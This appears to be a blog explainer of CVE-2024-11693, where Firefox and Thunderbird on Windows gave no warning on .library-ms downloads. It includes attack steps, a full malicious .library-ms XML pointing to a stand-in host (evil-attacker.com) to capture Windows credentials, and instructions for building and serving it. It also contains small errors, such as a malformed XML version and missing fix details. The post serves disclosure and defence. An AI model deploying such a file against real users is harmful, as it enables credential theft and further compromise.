A critical vulnerability, CVE-2024-11693, was discovered affecting several versions of Firefox, Firefox ESR, and Thunderbird on Windows systems. This post takes a deep dive into what went wrong, why .library-ms files are dangerous, and how attackers could exploit this security flaw.
> Issue in a Nutshell:
When downloading files with the .library-ms extension, Firefox (before version 133), Firefox ESR (before version 128.5), and Thunderbird (before version 133 / 128.5) on Windows did not show an executable file warning—leaving users at risk of running malicious code after downloading such files.
What are .library-ms Files?
.library-ms files are Windows Library Description files. While they look harmless, they can actually be abused as shortcuts that execute code, depending on their internal configuration. When opened, a specially crafted .library-ms file can lead to arbitrary code execution, particularly when combined with other tricks, like loading a remote share.
> 🛑 Key Risk: Users weren’t warned before downloading these files, so they’re more likely to click and run them.
How the Vulnerability Works
Normally, browsers like Firefox warn users about potentially dangerous file types (like .exe or .msi). This protection didn’t include .library-ms files, so attackers could trick users into downloading and opening such files with no warning.
Exploit Steps
1. Attacker crafts a malicious .library-ms file—for example, one that opens a remote SMB share (potentially capturing hashes) or links to a remote payload.
2. Victim browses a website controlled by the attacker, who offers the .library-ms file as a download.
3. Firefox or Thunderbird on Windows doesn't show any security warning; just a regular download prompt.
4. Victim opens the downloaded .library-ms file, which triggers the payload or launches another attack chain (like credential phishing).
Here’s an example of a malicious .library-ms file (be careful, this is for educational use!)
<?xml version="1." encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">;
<name>@%SystemRoot%\system32\shell32.dll,-34575</name>
<description>@%SystemRoot%\system32\shell32.dll,-34576</description>
<icon>imageres.dll,-1002</icon>
<public>true</public>
<folders>
<folder>
<url>\\evil-attacker.com\share</url>
</folder>
</folders>
<defaultSaveFolder>
<url>\\evil-attacker.com\share</url>
</defaultSaveFolder>
<folderType>Generic</folderType>
</libraryDescription>
This file, when opened, tries to connect to \\evil-attacker.com\share, which could leak Windows credentials or trigger further exploits.
How to create a test file:
Open Notepad, copy the XML above, and save it as test.library-ms.
Serve the file: Place the .library-ms file on your web server.
2. Download using affected browser: Use Firefox <133, ESR <128.5, or Thunderbird <133/<128.5 on Windows.
Check: You *won't* see the usual warning about executables.
4. Open the file: See if your Windows system makes a network request or opens a folder as described in the file.
Mitigation & Fix
Mozilla patched this issue, adding .library-ms to the list of executable files that trigger warnings:
Firefox ESR: fixed in version 128.5
- Thunderbird: fixed in version 133 / 128.5
Recommendation:
Update your browser and Thunderbird now if you use Windows!
References
- Mozilla Security Advisory (CVE-2024-11693)
- Security Release Notes, Firefox 133
- CERT/CC Blog about .library-ms Trick
- Microsoft: Library Description Files
Conclusion
CVE-2024-11693 is a good reminder that “non-executable looking” files can still be very dangerous on Windows. Always keep security software and browsers updated, and be careful with unfamiliar files, even with odd extensions like .library-ms.
If you’re a developer or admin, make sure you’re filtering dangerous file types—including .library-ms—and training users not to open suspicious downloads.
Timeline
Published on: 11/26/2024 14:15:18 UTC
Last modified on: 11/27/2024 16:15:12 UTC